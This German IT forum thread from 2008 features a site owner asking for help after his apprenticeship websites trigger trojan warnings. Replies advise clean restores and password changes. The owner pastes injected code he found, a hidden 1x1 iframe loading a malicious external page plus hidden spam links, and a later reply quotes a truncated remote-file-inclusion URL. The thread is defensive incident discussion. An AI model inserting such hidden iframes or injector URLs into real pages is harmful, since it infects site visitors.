Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Probleme mit Trojaner Warnungen auf meinen Webseiten

Frage Internet

Mitglied: Pussemuckelpeter

Pussemuckelpeter (Level 1) - Jetzt verbinden

13.02.2008, aktualisiert 07.08.2008, 10136 Aufrufe, 6 Kommentare

Hallo zusammen

Ich habe da glaube ich ein ernstes Problem

Meine beiden Seiten, www.die-lehrstellenaktion.de und www.die-lehrstellenaktion.at scheinen von Trojanern / Viren befallen zu sein.

Bei www.die-lehrstellenaktion.de erhalte ich diese Warnungen Trojan-Downloader.JS.IESlice.s bzw. Trojan.JS.Redirector.e

Bei www.die-lehrstellenaktion.at wird unten links in der Statusleiste beim internen Seitenwechsel ganz kurz folgende URL angezeigt www.leohin.com/diamond/...


Laut 1&1 , meinem Webhoster können die nix finden.


Ich möchte meine Seiten sauber und sicher haben, doch weiß ich nicht wie.

Der Programmierer hat auch leider keine Lösung, da er mir die Seiten zum Selbstkosten Preis realisiert hat, ohne die die Umsetzung nicht möglich gewesen wäre.


Ich hoffe das mir jemand helfen kann. Ich selber habe null Ahnung von Webprogrammierung...

Gruß
Mitglied: kaiand1
13.02.2008 um 20:34 Uhr
du scheinst da ein/mehere Javascripte zu haben wo sich der Trojaner befindet bzw ein Script? was da nicht hingehört
jedoch ohne einsicht kannst nur du selber dich auf die Suche machen.
Die frage ist auch wie der Schadcode bei dir reingekommen ist
Sicherheitslücke? Fehlerhaftes Programieren?
Bitte warten ..
Mitglied: wiesi200
13.02.2008 um 21:05 Uhr
Gehört zwar nicht hier her aber, tolle Seite. Hab’s gleich unseren Ausbildungsmeister geschickt.
Das hat wirklich Respekt verdient.
Bitte warten ..
Mitglied: filippg
13.02.2008 um 22:11 Uhr
Hallo,

hast du noch eine Lokale Sicherung der Skripte? Und die Daten liegen in einer Datenbank? Der Trojaner (so vorhanden) muss ja irgendwo liegen. Wenn du also alle Skripte löschst unad anschließend von deinem Rechner (wo noch keine Viren drauf sind) neu hochlädst sollte auch der Trojaner weg sein.
Vorher sicherstellen, dass man von allem aktuelle Backups hat.

Gruß

Filipp
Bitte warten ..
Mitglied: LordGurke
13.02.2008 um 22:22 Uhr
Hat vielleicht jemand deine FTP-Daten geknackt?
Einfach mal die FTP-Passwörter ändern und nach Möglichkeit den sauberen Code vom eigenen Rechner wieder hochladen.
Bitte warten ..
Mitglied: Pussemuckelpeter
14.02.2008 um 07:10 Uhr
Hallo, vielen Dank für Eure / Ihre Antworten.

Ich habe das hier in den beiden index Dateien gefunden:

<? include("login.php");?>
</p> <p style="line-height:150%; margin-top:0; margin-bottom:0;">&nbsp;
</p><iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
<div style="display:none"><a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/in ..." viagra</a>
<a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/ma ..." levitra</a><a href="http://lothlorian.org.ua;>buy" viagra, buy xenical, viagra,buy levitra, porno</a><a href="http://www.ptshome.com/pressreleases/lego/map.html;>Lego" toys</a>
<a href="http://www.ptshome.com/pressreleases/lego/index.html;>Lego</ ..."
</div>


Ich habe bereits dem Programmiere gebeten diese Einträge zu löschen und das Loginfeld vor weiteren Angriffen zu schützen.

Wenn mir jemand sagen könnte wie wir / er dies am sichersten tun könnte wäre ich mehr als dankbar.

Nochmals muss ich erwähnen, das der Programmierer mein vollstes Vertrauen hat und die Seiten nicht hätten realisiert werden können, wenn er diese zu einem "normalen" Satz abgerechnet hätte ...

Gruß
Bitte warten ..
Mitglied: 0x0badc0de
07.08.2008 um 23:47 Uhr
Hallo...

!!! ACHTUNG... !!! Dieser Beitrag enthält eine Beispiel-URL für einen sog. Injector-Link. Obwohl diese URL zum Zeitpunkt der Erstellung dieses Beitrages ins Leere geht, sei jedem dringlichst geraten dem Link niemals zu folgen!
Der Trojan.JS.Redirector.e wütet auch gerade bei einem meiner "Kunden". Leider ist es bei diesem nicht damit getan, einfach ein vierenfreies Backup der Web-Anwendung einzuspielen. Bei dem Kunden war der Virus nach ca. 2 Tagen wieder da. Vermutlich befindet sich irgenwo in der Datenbank ein sog. Injector-Link welcher die Virendateien von einem Fremd-Server über die URL auf den Server lädt (z.B. mit http://never.follow.me/products_new.php?action=http%3A%2F%2Fwww.oriolma ... ... vom Forum gekürzt... Komplettansicht im Quelltext). Ein FTP-Zugang ist dafür nicht erforderlich.
Ich würde, bevor ich das Backup einspiele, die Datenbank eindringlich nach URLs dieser Art durchsuchen.

mfg
0x0badc0de
Bitte warten ..
Ähnliche Inhalte
PHP
Zend Framework - Große Probleme mit Webseite (5)

Frage von harald.schmidt zum Thema PHP ...

JavaScript
gelöst Kopierschutz auf Webseite (13)

Frage von honeybee zum Thema JavaScript ...

Webentwicklung
Webseiten hosten (4)

Frage von Leon1234 zum Thema Webentwicklung ...

Festplatten, SSD, Raid
gelöst Current Pending Sector Count - Wie gefährlich sind hier Warnungen (4)

Frage von soundinle zum Thema Festplatten, SSD, Raid ...

Neue Wissensbeiträge
Ubuntu

Ubuntu 17.10 steht zum Download bereit

(3)

Information von Frank zum Thema Ubuntu ...

Datenschutz

Autofahrer-Pranger - Bewertungsportal illegal

(8)

Information von BassFishFox zum Thema Datenschutz ...

Windows 10

Neues Win10 Funktionsupdate verbuggt RemoteApp

(8)

Information von thomasreischer zum Thema Windows 10 ...

Microsoft

Die neuen RSAT-Tools für Win10 1709 sind da

(2)

Information von DerWoWusste zum Thema Microsoft ...

Heiß diskutierte Inhalte
Windows 10
Seekrank bei Windows 10 (18)

Frage von zauberer123 zum Thema Windows 10 ...

Windows 10
Windows 10 Fall Creators Update Fehler (13)

Frage von ZeroCool23 zum Thema Windows 10 ...

Router & Routing
gelöst Getrenntes Routing bei VoIP und Daten (12)

Frage von Hobbystern zum Thema Router & Routing ...